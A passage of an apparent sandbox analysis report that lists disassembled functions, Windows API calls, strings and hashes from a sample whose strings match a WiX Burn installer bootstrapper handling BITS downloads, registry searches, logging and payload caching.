Instruction Fuzzy Hash: D0B16635A00616EFDB11CF28C881F96BFA5BF48710F108169ED14AB352CB31F821EB84

Function 005BDE46 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 204stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 005BDE61

Strings

Failed to copy download URL., xrefs: 005BDEA8
Failed to set callback interface for BITS job., xrefs: 005BDF99
bitsuser.cpp, xrefs: 005BDE77, 005BDF6A
Failed to create BITS job., xrefs: 005BDEF0
Failed to add file to BITS job., xrefs: 005BDF2E
Failed to set credentials for BITS job., xrefs: 005BDF0F
Failed to create BITS job callback., xrefs: 005BDF74
Failed to initialize BITS job callback., xrefs: 005BDF82
Failed to download BITS job., xrefs: 005BDFF8
Failed to complete BITS job., xrefs: 005BE00B
Invalid BITS user URL: %ls, xrefs: 005BDE83
Failed while waiting for BITS download., xrefs: 005BE012
Falied to start BITS job., xrefs: 005BE019

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: lstrlen
String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS user URL: %ls$bitsuser.cpp
API String ID: 1659193697-2382896028
Opcode ID: 6ea5de8f073ea3019a8c8cf90e4dc3ff0f47264ea7275ab433c214b3a1cd782f
Instruction ID: 0292337be4b7a2e8a0ba4873b771a728b5fb0ff4f7ec0bcb676ba5f63b6d9809
Opcode Fuzzy Hash: 6ea5de8f073ea3019a8c8cf90e4dc3ff0f47264ea7275ab433c214b3a1cd782f
Instruction Fuzzy Hash: 4C611A31900229EBCB21AB54C889EEE7FB4FF18710B294156FD05AF251E7B5FD01AB91

Function 0059BC93 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 190processCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0059BCE5
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 0059BDF2
GetLastError.KERNEL32(?,?,?,?), ref: 0059BDFC
WaitForInputIdle.USER32(?,?), ref: 0059BE50
CloseHandle.KERNEL32(?,?,?), ref: 0059BE9B
CloseHandle.KERNEL32(?,?,?), ref: 0059BEA8

Strings

approvedexe.cpp, xrefs: 0059BE20
Failed to format obfuscated argument string., xrefs: 0059BD3C
Failed to create executable command., xrefs: 0059BD1F
D, xrefs: 0059BDD1
Failed to CreateProcess on path: %ls, xrefs: 0059BE2D
Failed to create obfuscated executable command., xrefs: 0059BD90
Failed to format argument string., xrefs: 0059BCF0
"%ls", xrefs: 0059BD62, 0059BD7C
"%ls" %s, xrefs: 0059BD0B, 0059BD4C

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseHandle$CreateErrorIdleInputLastOpen@16ProcessWait
String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$approvedexe.cpp
API String ID: 155678114-2737401750
Opcode ID: bfea706a924a1f4dfd973f8f889d4a9da16cb9d7809f1ad8bbd1b3722d29f027
Instruction ID: 619a815f0f86ab004d3985515ecb2aee4fa6d462ee3a645d2aca0471e5d1e149
Opcode Fuzzy Hash: bfea706a924a1f4dfd973f8f889d4a9da16cb9d7809f1ad8bbd1b3722d29f027
Instruction Fuzzy Hash: 92516A72D0061AFBEF21AFD4DE469EEBF79BF04300B144566EA14B6210E7319E109B91

Function 005A3B4E Relevance: 24.6, APIs: 5, Strings: 9, Instructions: 130COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,?,00000000,crypt32.dll), ref: 005A3BA2
GetLastError.KERNEL32(?,00000000,crypt32.dll), ref: 005A3BAC
GetCurrentProcessId.KERNEL32(?,?,?,00000104,?,?,00000000,crypt32.dll), ref: 005A3C15
ProcessIdToSessionId.KERNEL32(00000000,?,00000000,crypt32.dll), ref: 005A3C1C
CompareStringW.KERNEL32(00000000,00000000,?,?,?,?,?,7FFFFFFF,?,?,?,?,?,00000000,crypt32.dll), ref: 005A3CA6

Strings

Failed to get length of session id string., xrefs: 005A3C71
Failed to copy temp folder., xrefs: 005A3CCF
Failed to get temp folder., xrefs: 005A3BDA
%u\, xrefs: 005A3C36
logging.cpp, xrefs: 005A3BD0
4#v, xrefs: 005A3BA2
crypt32.dll, xrefs: 005A3B61
Failed to get length of temp folder., xrefs: 005A3C06
Failed to format session id as a string., xrefs: 005A3C4A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Process$CompareCurrentErrorLastPathSessionStringTemp
String ID: 4#v$%u\$Failed to copy temp folder.$Failed to format session id as a string.$Failed to get length of session id string.$Failed to get length of temp folder.$Failed to get temp folder.$crypt32.dll$logging.cpp
API String ID: 2407829081-4287186919
Opcode ID: 482ec523e310879b48a1c1cf6ca83e17f80b74a50f92895ffc2ebb3b2e19f1ca
Instruction ID: 40a34a60d4bf0712e73a44663c4dbd1f0a09f4ab9c3c0ba5273d3892fa701960
Opcode Fuzzy Hash: 482ec523e310879b48a1c1cf6ca83e17f80b74a50f92895ffc2ebb3b2e19f1ca
Instruction Fuzzy Hash: AF416E72D8123EAADB209B548C4DADD7B68BF15720F1102A2F918B7241EA749F449BE0

Function 0059A28B Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 138registryCOMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 0059A2B3
_MREFOpen@16.MSPDB140-MSVCRT ref: 0059A30E
RegQueryValueExW.ADVAPI32(000002C0,00000100,00000000,000002C0,00000000,00000000,000002C0,?,00000100,00000000,?,00000000,?,000002C0,000002C0,?), ref: 0059A32F
RegCloseKey.ADVAPI32(00000000,00000100,00000000,000002C0,00000100,00000000,000002C0), ref: 0059A405

Strings

Failed to set variable., xrefs: 0059A3BD
Failed to format key string., xrefs: 0059A2BE
Failed to format value string., xrefs: 0059A319
Failed to query registry key value., xrefs: 0059A36A
Failed to open registry key. Key = '%ls', xrefs: 0059A3C7
Registry key not found. Key = '%ls', xrefs: 0059A396
RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 0059A3DD
Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0059A37A
search.cpp, xrefs: 0059A360

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Open@16$CloseQueryValue
String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
API String ID: 2702208347-46557908
Opcode ID: 291b7e3491c5c56753d4d6859e04847458550965f36a3687c68d6c67e61f0759
Instruction ID: 7af2ddb5f5f2be50eaefba351d2c48af7e46b4751e2357d2a27736d201e7dd5a
Opcode Fuzzy Hash: 291b7e3491c5c56753d4d6859e04847458550965f36a3687c68d6c67e61f0759
Instruction Fuzzy Hash: F141D632D41125BBDF226BA8CC0AFAEBF65FB44710F114557F814BA292D7319E10A7E1

Function 0059B208 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 137COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,0059BAFB,00000008,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B210
GetLastError.KERNEL32(?,0059BAFB,00000008,?,00000000,00000000,?,?,?,00000000,7736C3F0,00000000), ref: 0059B21C

Strings

burn, xrefs: 0059B2EB
Failed to find valid NT image header in buffer., xrefs: 0059B2A8
Failed to find Burn section., xrefs: 0059B332
Failed to get module handle to process., xrefs: 0059B24A
Failed to find valid DOS image header in buffer., xrefs: 0059B27D
Failed to read section info, data to short: %u, xrefs: 0059B314
section.cpp, xrefs: 0059B240, 0059B271, 0059B29C, 0059B305, 0059B326, 0059B34F, 0059B38F
.wixburn, xrefs: 0059B2BE
.wix, xrefs: 0059B2E3
Failed to read section info, unsupported version: %08x, xrefs: 0059B35E
Bundle guid didn't match the guid in the PE Header in memory., xrefs: 0059B39B

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorHandleLastModule
String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$section.cpp
API String ID: 4242514867-926796631
Opcode ID: 10ee7429aa83bb37dc502ee571d7e787a33e990263c5b45dc21da168d19b047a
Instruction ID: 1840d5d555ae152173c051b42dedbd7e8e4763bcdadc40c82c0f5599f44ef84d
Opcode Fuzzy Hash: 10ee7429aa83bb37dc502ee571d7e787a33e990263c5b45dc21da168d19b047a
Instruction Fuzzy Hash: 94413836281211E7FF316649AD4AE6E3F55FBC4B30B65442BF8025F2C2D7A4C94293E5

Function 0059694B Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 133libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 0059699B
GetLastError.KERNEL32 ref: 005969A5
GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 005969E8
GetLastError.KERNEL32 ref: 005969F2
FreeLibrary.KERNEL32(00000000,00000000,?), ref: 00596B03

Strings

RtlGetVersion, xrefs: 005969DD
ntdll, xrefs: 00596995
Failed to locate RtlGetVersion., xrefs: 00596A20
variable.cpp, xrefs: 005969C9, 00596A16
Failed to set variant value., xrefs: 00596AE7
Failed to get OS info., xrefs: 00596A43
Failed to locate NTDLL., xrefs: 005969D3

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
String ID: Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
API String ID: 3057421322-109962352
Opcode ID: cc918db8a08348f4b30ab1a35a7aecaa5c51b6e4ca662aa92b097fa17354c397
Instruction ID: 285a3dbd0d869c3088778639d380b8667577cb316c156d442c2ef8e143fa47a7
Opcode Fuzzy Hash: cc918db8a08348f4b30ab1a35a7aecaa5c51b6e4ca662aa92b097fa17354c397
Instruction Fuzzy Hash: 5441A472D41239DBDF319B698C19BEA7FB4FB08710F01419BE908B6290E7758E48DB90

Function 005948EF Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130memorysynchronizationCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00000001,00000001,00000000,00000000,?,?,?,00595466,?,?,?,?), ref: 00594920
GetLastError.KERNEL32(?,?,?,00595466,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00594931
ReleaseMutex.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00594A6E
CloseHandle.KERNEL32(?,?,?,?,00595466,?,?,?,?,?,?,?,?,?,?,?), ref: 00594A77

Strings

Failed to pump messages from parent process., xrefs: 00594A42
comres.dll, xrefs: 005949DD
user.cpp, xrefs: 00594955, 0059499E
Failed to set elevated pipe into thread local storage for logging., xrefs: 005949A8
Failed to allocate thread local storage for logging., xrefs: 0059495F
Failed to create the message window., xrefs: 005949CC
Failed to connect to unelevated process., xrefs: 00594916

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: AllocCloseErrorHandleLastMutexRelease
String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create the message window.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$comres.dll$user.cpp
API String ID: 687263955-1790235126
Opcode ID: f1b897c0e2d254f53cba6248ca7377570ce34937681c690bf5d0cd084ac67ffb
Instruction ID: 6a59534a0965ff01c8195c5b99a674a0ed20a8d0cb9d92b3272bbc66488ab1dc
Opcode Fuzzy Hash: f1b897c0e2d254f53cba6248ca7377570ce34937681c690bf5d0cd084ac67ffb
Instruction Fuzzy Hash: 16418372941626FBDB219BA4CC49EEFBF6DBB44750F010227BA15A7240DB30AD119AE4

Function 00597FA5 Relevance: 21.2, APIs: 2, Strings: 12, Instructions: 216COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,000000B9,00000002,?,00000000,00000000,00000000,00000000,00000001,00000000,00000002,000000B9), ref: 00597FC2
LeaveCriticalSection.KERNEL32(?), ref: 005981EA

Strings

Unsupported variable type., xrefs: 005981A7
Failed to write literal flag., xrefs: 005981C3
Failed to write variable count., xrefs: 00597FDD
Failed to get numeric., xrefs: 005981BC
Failed to write variable value type., xrefs: 005981CA
Failed to write variable value as number., xrefs: 00598194
Failed to write variable name., xrefs: 005981D1
feclient.dll, xrefs: 0059809D, 005980F3, 00598134
Failed to get version., xrefs: 0059819B
Failed to get string., xrefs: 005981B5
Failed to write variable value as string., xrefs: 005981AE
Failed to write included flag., xrefs: 005981D8

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get numeric.$Failed to get string.$Failed to get version.$Failed to write included flag.$Failed to write literal flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.$feclient.dll
API String ID: 3168844106-2118673349
Opcode ID: 593943f7561a40ec583b7d42fc2a84df2ce25e63d5a92b7bab2dadcd36f0af58
Instruction ID: c8fd4f1245e1be88e33caad07a7dd49e4930285989b347aa3204e87f0bf4de0c
Opcode Fuzzy Hash: 593943f7561a40ec583b7d42fc2a84df2ce25e63d5a92b7bab2dadcd36f0af58
Instruction Fuzzy Hash: 9C71803290062AAFCF129EA8C845FBE7FA9BB45350F104566E900A7251DB31DD16EBA0

Function 005D02F8 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 123COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 005D033C
GetComputerNameW.KERNEL32(?,?), ref: 005D0394

Strings

Hd_, xrefs: 005D043D
Executable: %ls v%d.%d.%d.%d, xrefs: 005D03F0
=== Logging started: %ls ===, xrefs: 005D03BF
\d_, xrefs: 005D042D
Td_, xrefs: 005D0435
@d_, xrefs: 005D0445
dd_, xrefs: 005D044D
--- logging level: %hs ---, xrefs: 005D0454
Computer : %ls, xrefs: 005D0402
8d_, xrefs: 005D030D

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Name$ComputerFileModule
String ID: --- logging level: %hs ---$8d_$=== Logging started: %ls ===$@d_$Computer : %ls$Executable: %ls v%d.%d.%d.%d$Hd_$Td_$\d_$dd_
API String ID: 2577110986-802233327
Opcode ID: a7346559cb4acfd5b84929dff21ba2560ca524bb35a807262bf071babdccf4bf
Instruction ID: b7a6db41b79f8f3fd53057b4a514c4b1775a307c098ade39d8573a3b4463362c
Opcode Fuzzy Hash: a7346559cb4acfd5b84929dff21ba2560ca524bb35a807262bf071babdccf4bf
Instruction Fuzzy Hash: 0F4133F29001199BCF20DB68DD49FBA7BBCFB54300F4055ABE609E3241D674AE849F65

Function 005A97B2 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 123fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,005AA843,00000000,00000000,00000000,?,00000000), ref: 005A97CD
GetLastError.KERNEL32(?,005AA843,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 005A97DD

Part of subcall function 005D4102: Sleep.KERNEL32(?,00000000,?,005A85EE,?,?,00000001,00000003,000007D0,?,?,?,?,?,?,00594DBC), ref: 005D4119

CloseHandle.KERNEL32(00000000,00000000,00000001,00000003,000007D0,?,00000000,00000000,00000000), ref: 005A98E9

Strings

%ls payload from working path '%ls' to path '%ls', xrefs: 005A9894
Failed to verify payload hash: %ls, xrefs: 005A9875
Failed to move %ls to %ls, xrefs: 005A98C1
Failed to copy %ls to %ls, xrefs: 005A98D7
Moving, xrefs: 005A987F
cache.cpp, xrefs: 005A9801
Failed to verify payload signature: %ls, xrefs: 005A9838
Copying, xrefs: 005A9888, 005A9893
Failed to open payload in working path: %ls, xrefs: 005A980C

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLastSleep
String ID: %ls payload from working path '%ls' to path '%ls'$Copying$Failed to copy %ls to %ls$Failed to move %ls to %ls$Failed to open payload in working path: %ls$Failed to verify payload hash: %ls$Failed to verify payload signature: %ls$Moving$cache.cpp
API String ID: 1275171361-1604654059
Opcode ID: fa981ee1af11481ffe43a79f9de8a0af091a9e4f0c96c9ecd306a659d853f990
Instruction ID: fdefaa820e14bd27d6af4ba3dda78d85921bb3579f146b7a3bf58d3909eb0a0a
Opcode Fuzzy Hash: fa981ee1af11481ffe43a79f9de8a0af091a9e4f0c96c9ecd306a659d853f990
Instruction Fuzzy Hash: F031C776941276BBDA3216569C4AF6F2E5CFF87F60F01051AFE047B281D364DD00A6E1

Function 005965C0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 118COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000), ref: 005965FC

Part of subcall function 005D0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00595EB2,00000000), ref: 005D0AE0
Part of subcall function 005D0ACC: GetProcAddress.KERNEL32(00000000), ref: 005D0AE7
Part of subcall function 005D0ACC: GetLastError.KERNEL32(?,?,?,00595EB2,00000000), ref: 005D0AFE

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00596628
GetLastError.KERNEL32 ref: 00596636
GetSystemWow64DirectoryW.KERNEL32(?,00000104,00000000), ref: 0059666E
GetLastError.KERNEL32 ref: 00596678
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005966BB
GetLastError.KERNEL32 ref: 005966C5

Strings

Failed to set system folder variant value., xrefs: 00596724
variable.cpp, xrefs: 0059665A, 0059669C
Failed to backslash terminate system folder., xrefs: 00596708
Failed to get 32-bit system folder., xrefs: 005966A6
Failed to get 64-bit system folder., xrefs: 00596664

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$DirectorySystem$AddressCurrentHandleModuleProcProcessWow64
String ID: Failed to backslash terminate system folder.$Failed to get 32-bit system folder.$Failed to get 64-bit system folder.$Failed to set system folder variant value.$variable.cpp
API String ID: 325818893-1590374846
Opcode ID: 0ec405eb38cc0ab7967fb890173e3844b2eba9c53a7984722566ecb4ce1e0aa7
Instruction ID: f077262017f2db3db806e6b34a1d016dffa6f27cc3e8c01022c8c6c0f4c9323e
Opcode Fuzzy Hash: 0ec405eb38cc0ab7967fb890173e3844b2eba9c53a7984722566ecb4ce1e0aa7
Instruction Fuzzy Hash: 7A31EF72D4223AA7DF3197A48C4DBAA7F68BB10750F024557AD04AB280EB74DD48DAE1

Function 005A3F9B Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 220sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 005A3AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,005A3FB5,feclient.dll,?,00000000,?,?,?,00594B12), ref: 005A3B42

Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00594B12,?,?,005DB488,?,00000001,00000000,00000000), ref: 005A404C

Strings

clbcatq.dll, xrefs: 005A4185
Failed to get non-session specific TEMP folder., xrefs: 005A40F6
Failed to copy full log path to prefix., xrefs: 005A41AF
Failed to get current directory., xrefs: 005A402E
Failed to open log: %ls, xrefs: 005A40C8
Failed to copy log path to prefix., xrefs: 005A416E
Setup, xrefs: 005A3FF9
log, xrefs: 005A3FF3
feclient.dll, xrefs: 005A3FAF, 005A405C
msasn1.dll, xrefs: 005A4162, 005A41A3
Failed to copy log extension to extension., xrefs: 005A4191
crypt32.dll, xrefs: 005A3FF2, 005A4057, 005A405F, 005A40C6, 005A4100, 005A4141, 005A4160, 005A419E, 005A41C8

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseSleep
String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
API String ID: 2834455192-2673269691
Opcode ID: d7d3d7f50e6feade7299e4b4fa35082d52c6c7cd50b718c14a92af46ab66826f
Instruction ID: 1509c2cfa6d96162111c5ca81f9c2b835c2758f6ffd4742502374dd51f4bd3f9
Opcode Fuzzy Hash: d7d3d7f50e6feade7299e4b4fa35082d52c6c7cd50b718c14a92af46ab66826f
Instruction Fuzzy Hash: CE619171A00616ABDF259BA4CC4AB7E7FA8FF92340F144566F901DB140E7B0ED90DBA0

Function 00596DB9 Relevance: 19.7, APIs: 2, Strings: 11, Instructions: 166COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000001,?,00000000,00595445,00000006,?,005982B9,?,?,?,00000000,00000000,00000001), ref: 00596DC8

Part of subcall function 005956A9: CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00596595,00596595,?,0059563D,?,?,00000000), ref: 005956E5
Part of subcall function 005956A9: GetLastError.KERNEL32(?,0059563D,?,?,00000000,?,?,00596595,?,00597F02,?,?,?,?,?), ref: 00595714

LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,005982B9), ref: 00596F59

Strings

Failed to insert variable '%ls'., xrefs: 00596E0D
variable.cpp, xrefs: 00596E4B
Attempt to set built-in variable value: %ls, xrefs: 00596E56
Setting numeric variable '%ls' to value %lld, xrefs: 00596EFA
Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00596F6B
Failed to find variable value '%ls'., xrefs: 00596DE3
Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00596ED0
Setting hidden variable '%ls', xrefs: 00596E86
Setting string variable '%ls' to value '%ls', xrefs: 00596EED
Failed to set value of variable: %ls, xrefs: 00596F41
Unsetting variable '%ls', xrefs: 00596F15

Memory Dump Source

